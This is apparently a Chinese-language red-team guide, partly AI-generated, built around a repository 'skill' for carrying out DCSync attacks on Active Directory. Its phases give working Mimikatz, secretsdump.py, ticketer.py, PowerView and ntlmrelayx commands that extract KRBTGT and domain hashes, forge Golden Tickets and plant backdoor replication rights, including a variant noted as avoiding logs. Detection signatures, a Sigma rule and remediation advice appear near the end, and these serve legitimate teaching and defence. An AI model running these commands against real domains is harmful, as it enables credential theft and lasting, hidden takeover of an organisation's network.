Anthropic-Cybersecurity-Skills 实战指南:基于 DCSync 的 Active Directory 域持久化攻击全流程(T1003.006)

Anthropic-Cybersecurity-Skills 实战指南:基于 DCSync 的 Active Directory 域持久化攻击全流程(T1003.006) Anthropic-Cybersecurity-Skills 实战指南基于 DCSync 的 Active Directory 域持久化攻击全流程T1003.006【免费下载链接】Anthropic-Cybersecurity-Skills817 structured cybersecurity skills for AI agents · Mapped to 6 frameworks: MITRE ATTCK, NIST CSF 2.0, MITRE ATLAS, D3FEND, NIST AI RMF MITRE F3 (Fight Fraud) · agentskills.io standard · Works with Claude Code, GitHub Copilot, Codex CLI, Cursor, Gemini CLI 20 platforms · 29 security domains · Apache 2.0项目地址: https://gitcode.com/GitHub_Trending/an/Anthropic-Cybersecurity-Skills导读本指南以 Anthropic-Cybersecurity-Skills 仓库中的conducting-domain-persistence-with-dcsyncskill 为核心系统讲解如何利用 MS-DRSR 复制协议DS-Replication-Get-Changes / Get-Changes-All 扩展权限模拟域控制器提取 KRBTGT、域管理员与服务账户哈希进而伪造 Golden Ticket 实现长期域持久化。读完本文你将掌握枚举复制权限账户 → DCSync 凭证提取 → Golden Ticket 伪造 → 复制权限后门持久化的完整攻击链同时获得配套的检测签名、Sigma 规则与自动化审计脚本仓库内 agent.py 与 process.py的源码级使用指导。法律声明本 skill 仅用于授权的安全测试与教育目的。对未经你拥有或书面授权测试的系统进行未授权使用属违法行为可能触犯计算机欺诈相关法律。DCSync 攻击原理与威胁背景DCSync 是一种滥用 Microsoft 目录复制服务远程协议MS-DRSR即 DRSUAPI 接口的攻击技术攻击者通过向目标域控制器发起复制请求冒充域控制器获取指定账户的密码数据。该技术由 Mimikatz 作者 Benjamin Delpy 与 Vincent Le Toux 引入其核心是利用DS-Replication-Get-Changes与DS-Replication-Get-Changes-All两项扩展权限。任何拥有这些权限的主体用户或计算机账户都可以复制域内任意账户的密码哈希包括 KRBTGT 账户。一旦取得 KRBTGT 哈希攻击者即可伪造 Golden Ticket获得无限期的域级持久访问能力。这也是为什么该技术被归类为 MITRE ATTCKT1003.006OS Credential Dumping: DCSync并成为 APT28Fancy Bear、APT29Cozy Bear、FIN6 等知名 APT 组织广泛使用的关键后渗透技术——仓库的 standards.md 中同样记录了 Wizard SpiderRyuk 勒索软件行动对 DCSync 的使用。在实战中DCSync 有三大典型用途分别对应本 skill 的三个目标层次凭证提取一次性提取 KRBTGT、Administrator 及所有域账户哈希持久化建立利用 KRBTGT 哈希伪造 Golden Ticket或为受控账户授予 DCSync 权限检测验证通过复现 DRSUAPI 异常流量、事件 4662 等特征验证蓝队检测能力。何时使用与前置条件该 skill 适用于以下场景安全评估中需要建立域级持久化能力的红队任务与 DCSync 相关安全事件的应急响应流程计划内的周期性安全测试与审计活动通过实战化测试验证安全控制的有效性。前置条件熟悉红队概念与常用工具Mimikatz、Impacket、PowerView 等拥有可安全执行测试的实验或演练环境Python 3.8 及所需依赖impacket、ldap3安装方式见 api-reference.md对目标系统拥有明确授权。攻击目标Objectives完整攻击链需要达成的目标如下识别 Active Directory 中拥有 DCSync复制权限的账户使用 Mimikatz 或 Impacket 的secretsdump.py执行 DCSync提取 KRBTGT 账户哈希用于 Golden Ticket 创建导出全部域用户密码哈希用于凭证分析伪造 Golden Ticket 实现持久域访问为受控账户授予 DCSync 权限作为替代持久化机制记录攻击链与持久化机制输出完整证据。MITRE ATTCK 映射技术编号名称战术阶段T1003.006OS Credential Dumping: DCSyncCredential AccessT1558.001Steal or Forge Kerberos Tickets: Golden TicketCredential AccessT1222.001File and Directory Permissions Modification: WindowsDefense EvasionT1098Account ManipulationPersistenceT1078.002Valid Accounts: Domain AccountsPersistence该映射与仓库全局 ATTACK_COVERAGE.md 中对该 skill 的技术覆盖标注一致也与 standards.md 中的表格完全对应。完整攻击工作流Phase 1识别拥有 DCSync 权限的账户DCSync 的第一步是找到谁拥有复制权限。提供三种枚举手段PowerViewWindows / PowerShell——枚举域根对象上带 Replicating 关键字 ACE 类型且含 ExtendedRight 权限的主体Get-DomainObjectAcl -SearchBase DCdomain,DClocal -ResolveGUIDs | Where-Object { ($_.ObjectAceType -match Replicating) -and ($_.ActiveDirectoryRights -match ExtendedRight) } | Select-Object SecurityIdentifier, ObjectAceTypeBloodHound Cypher 查询——直接从域图中找出能通向 Domain 节点的 DCSync / GetChanges / GetChangesAll 路径MATCH (u)-[:DCSync|GetChanges|GetChangesAll*1..]-(d:Domain) RETURN u.name, d.nameImpacket findDelegation.pyLinux——快速验证当前凭据是否具备相关能力findDelegation.py domain.local/user:Password123 -dc-ip 10.10.10.1默认拥有 DCSync 权限的账户基线清单Domain AdminsEnterprise AdminsDomain Controllers 组域控制器上的 SYSTEM源码深化仓库提供的 agent.py 中的check_dcsync_permissions()函数将这一枚举自动化它通过ldap3以 NTLM 绑定域控制器构造(objectCategoryperson)(objectClassuser)(adminCount1)的 LDAP 过滤器枚举高权限账户并将nTSecurityDescriptor与两个核心复制权限 GUID 关联。其中常量定义与复制权限的对应关系为1131f6aa-9c07-11d1-f79f-00c04fc2dcd2→ DS-Replication-Get-Changes1131f6ad-9c07-11d1-f79f-00c04fc2dcd2→ DS-Replication-Get-Changes-All这两个 GUID 同时也是后续检测 DCSync 流量的关键指纹详见 api-reference.md。Phase 2DCSync 凭证提取拿到具备复制权限的凭据后即可直接向 DC 发起复制请求提取哈希。MimikatzWindows 端# 提取指定账户KRBTGT 用于 Golden Ticket mimikatz.exe lsadump::dcsync /domain:domain.local /user:krbtgt # 提取域管理员 mimikatz.exe lsadump::dcsync /domain:domain.local /user:administrator # 提取全部域账户CSV 格式 mimikatz.exe lsadump::dcsync /domain:domain.local /all /csvImpacket secretsdump.pyLinux 端# 导出全部凭证 secretsdump.py domain.local/admin:Password12310.10.10.1 # 仅导出指定用户 secretsdump.py -just-dc-user krbtgt domain.local/admin:Password12310.10.10.1 # 仅导出 NTLM 哈希不含 Kerberos 密钥 secretsdump.py -just-dc-ntlm domain.local/admin:Password12310.10.10.1 # 使用 Kerberos 票据认证免密码推荐规避日志场景 export KRB5CCNAMEadmin.ccache secretsdump.py -k -no-pass domain.local/adminDC01.domain.local源码深化——secretsdump 输出自动化分析仓库的 process.py 提供了解析secretsdump.py输出的完整实现。其parse_secretsdump_output()使用正则^(.?):([\d]):([a-fA-F0-9]{32}):([a-fA-F0-9]{32}):::匹配 NTDS 哈希行用户名: RID: LM 哈希: NT 哈希同时用^(.?):CLEARTEXT:(.)$匹配明文密码行并自动区分用户账户与机器账户以$结尾自动提取krbtgt与administrator的 NT 哈希作为关键凭证通过analyze_password_reuse()按 NT 哈希分组检测跨账户密码复用跳过空密码哨兵值31d6cfe0d16ae931b73c59d7e0c089c0生成完整的 DCSync 凭证分析报告包含持久化机会清单Golden Ticket、Silver Ticket、Pass-the-Hash、离线破解。运行方式python3 process.py secretsdump_output.txt脚本会在标准输出打印报告并保存为dcsync_analysis_时间戳.txt。Phase 3Golden Ticket 伪造拿到 KRBTGT 的 NT 哈希后即可伪造任意身份的 Kerberos TGT。关键前提是域 SID格式S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX可从whoami /user或 PowerView 获取。MimikatzWindows 端# 创建基础 Golden Ticket 并注入当前会话 mimikatz.exe kerberos::golden /user:administrator /domain:domain.local \ /sid:S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX \ /krbtgt:krbtgt_ntlm_hash /ptt # 指定自定义组隶属512Domain Admins, 513Domain Users, # 518Schema Admins, 519Enterprise Admins, 520Group Policy Creators mimikatz.exe kerberos::golden /user:fakeadmin /domain:domain.local \ /sid:S-1-5-21-XXXXXXXXXX \ /krbtgt:krbtgt_ntlm_hash \ /groups:512,513,518,519,520 /pttImpacket ticketer.pyLinux 端# 创建 Golden Ticket ticketer.py -nthash krbtgt_ntlm_hash -domain-sid S-1-5-21-XXXXXXXXXX \ -domain domain.local administrator # 使用票据访问目标 export KRB5CCNAMEadministrator.ccache psexec.py -k -no-pass domain.local/administratorDC01.domain.local生命周期视角workflows.md 中清晰给出了 Golden Ticket 的生命周期模型创建: KRBTGT hash 域 SID → Golden Ticket约 10 年有效 使用: 导入票据 → 访问域内任意服务 生存: 普通密码重置无法清除除非双重 KRBTGT 重置 检测: 异常 TGT 生存期、不存在的用户、不可能的 SID 清除: 双重 KRBTGT 密码重置两次重置间隔须超过 10 小时Phase 4通过 DCSync 权限实现持久化除了 Golden Ticket还可以为受控的低调账户直接授予复制权限形成可独立执行 DCSync 的持久后门——这也是攻击者避免依赖 KRBTGT易被检测/重置的替代方案。PowerView 授权与验证# 为后门账户添加 DS-Replication-Get-Changes-All 权限 Add-DomainObjectAcl -TargetIdentity DCdomain,DClocal \ -PrincipalIdentity backdoor_user -Rights DCSync # 验证权限已生效 Get-DomainObjectAcl -SearchBase DCdomain,DClocal -ResolveGUIDs | Where-Object { $_.SecurityIdentifier -match backdoor_user_SID }ntlmrelayx.py 自动化提权在已截获 NTLM 认证的场景下可通过 LDAP 中继直接为指定用户添加 DCSync 权限ntlmrelayx.py -t ldap://DC01.domain.local --escalate-user backdoor_user工作流全景结合 workflows.md完整攻击链可归纳为1. 前置条件 ├── 域管理员或具备复制权限的账户 ├── 到域控制器的网络可达性TCP/135、动态 RPC └── 工具: MimikatzWindows或 secretsdump.pyLinux 2. 凭证提取 ├── 提取 KRBTGT 哈希Golden Ticket 能力 ├── 提取 Administrator 哈希即时 DA 访问 ├── 提取全部域哈希全面导出 └── 提取服务账户哈希横向移动 3. Golden Ticket 持久化 ├── 使用 KRBTGT 哈希伪造票据 ├── 设置任意用户、SID 与组成员关系 ├── 导入票据到当前会话 └── 访问域内任意资源 4. DCSync 权限持久化 ├── 在 AD 中创建低调账户 ├── 授予 DS-Replication-Get-Changes-All 权限 ├── 通过 ACL 枚举验证权限 └── 该账户可独立执行 DCSync工具矩阵工具用途平台MimikatzDCSync 提取、Golden Ticket 创建Windowssecretsdump.py远程 DCSyncImpacketLinuxPythonticketer.pyGolden Ticket 创建ImpacketLinuxPythonPowerViewACL 枚举与修改WindowsPowerShellRubeusKerberos 票据操作Windows.NETntlmrelayx.py通过中继实现 DCSync 权限提升LinuxPythonPython 依赖的安装与关键方法可参考 api-reference.mdpip install ldap3 impacket pyadServer、Connection(authenticationNTLM)、conn.search()、conn.entries、conn.unbind()等 ldap3 核心调用。应优先提取的关键哈希账户用途持久化价值krbtgtGolden Ticket 创建无限期域访问Administrator直接 DA 访问即时特权访问服务账户横向移动跨域服务访问计算机账户Silver Ticket 创建服务级模拟process.py 生成的报告中会对上述账户分级标注影响KRBTGT → Golden Ticket 能力Administrator → 通过 Pass-the-Hash 直接获取 DA服务/机器账户 → Silver Ticket 与横向移动。检测签名与蓝队视角攻击链条的每一环都有对应的检测信号指标检测方法来自非 DC 来源的 DrsGetNCChanges RPC 调用对异常 IP 的 DRSUAPI 流量进行网络监控事件 4662 携带 Replicating Directory Changes GUIDDC 上的 Windows 安全日志1131f6aa-/1131f6ad-GUID事件 4624 出现 Golden Ticket 异常不可能的 SID 或不存在用户的登录事件域根对象的 ACL 修改事件 5136目录服务更改复制流量量激增网络基线偏差监控源码深化——自动化检测与 Sigma 规则agent.py 内置了三个可直接复用的检测组件detect_dcsync_events(log_file)解析导出的 Windows 安全事件 JSON当事件 4662 的属性中出现复制 GUID含第三个89e95b76-444d-4c62-991a-0facbeda640c即 DS-Replication-Get-Changes-In-Filtered-Set时标记为CRITICALgenerate_sigma_rule()程序化生成生产级 Sigma 检测规则——EventID: 4662且属性包含两个复制 GUID并过滤以$结尾的机器账户正常复制主体以减少误报标记attack.credential_access/attack.t1003.006{ title: DCSync Attack Detected via Directory Replication, logsource: {product: windows, service: security}, detection: { selection: { EventID: 4662, Properties|contains: [ 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2, 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2, ], }, filter: {SubjectUserName|endswith: $}, condition: selection and not filter, }, level: critical, }run_audit(...)与 CLI 入口--server、--domain、--username、--password、--log-file、--output参数将枚举高权限账户、解析检测事件、输出 Sigma 规则三合一一键生成 JSON 审计报告。验证标准Validation Criteria红队/检测验证结束后应逐项核对以下清单已枚举具备 DCSync 权限的账户已通过 DCSync 提取 KRBTGT 哈希已成功导出全部域凭证已伪造 Golden Ticket 并验证 DA 访问已建立 DCSync 权限持久化机制如范围内已使用 Golden Ticket 验证对域控制器的访问证据已记录含哈希值与时间戳已提供修复建议双重 KRBTGT 重置、ACL 审计证据记录与报告模板仓库在 assets/template.md 中提供了标准的 DCSync 攻击报告模板包含目标域域名、域 SID、目标 DC、攻击源账户、使用工具提取凭证账户、类型、NT 哈希、明文、持久化价值持久化机制Golden Ticket、DCSync 权限、Silver Tickets 的状态修复建议与优先级行动优先级双重 KRBTGT 密码重置两次间隔 10 小时以上关键审计拥有复制权限的账户关键开启复制 GUID 的事件 4662 日志记录高部署 DRSUAPI 流量监控高修复与加固建议基于攻击链的每一环防守方应落实以下缓解措施双重 KRBTGT 重置Golden Ticket 在普通密码重置后仍然有效必须连续两次重置 KRBTGT 密码间隔超过 10 小时确保域内所有 DC 完成复制才能彻底失效已伪造的票据最小化复制权限定期审计域根对象 ACL将 DS-Replication-Get-Changes(-All) 严格限制在 Domain Admins / Enterprise Admins / DC 组范围内移除任何多余授权开启关键日志在 DC 上启用事件 4662 的复制 GUID 审计与事件 5136目录服务更改审计网络层监控对 DRSUAPI 流量建立基线对来自非 DC 主机的复制请求实时告警凭证卫生通过密码复用分析如 process.py 的能力识别共享口令账户并及时整改。结语DCSync 之所以是红队持久化的黄金标准技术在于它以极少的权限前提仅需复制权限而非本地管理员撬动了整个域的凭证体系并通过 KRBTGT 哈希实现近乎无限期的持久访问。本 skill 及其配套脚本agent.py、process.py完整覆盖了从权限枚举、凭证提取、票据伪造到持久化建立的攻防两侧能力。防守团队应优先补齐事件 4662/5136 审计与 DRSUAPI 流量监控并严格执行 KRBTGT 双重重置这一唯一可靠的票据失效手段。所有测试务必在授权范围内进行。【免费下载链接】Anthropic-Cybersecurity-Skills817 structured cybersecurity skills for AI agents · Mapped to 6 frameworks: MITRE ATTCK, NIST CSF 2.0, MITRE ATLAS, D3FEND, NIST AI RMF MITRE F3 (Fight Fraud) · agentskills.io standard · Works with Claude Code, GitHub Copilot, Codex CLI, Cursor, Gemini CLI 20 platforms · 29 security domains · Apache 2.0项目地址: https://gitcode.com/GitHub_Trending/an/Anthropic-Cybersecurity-Skills创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考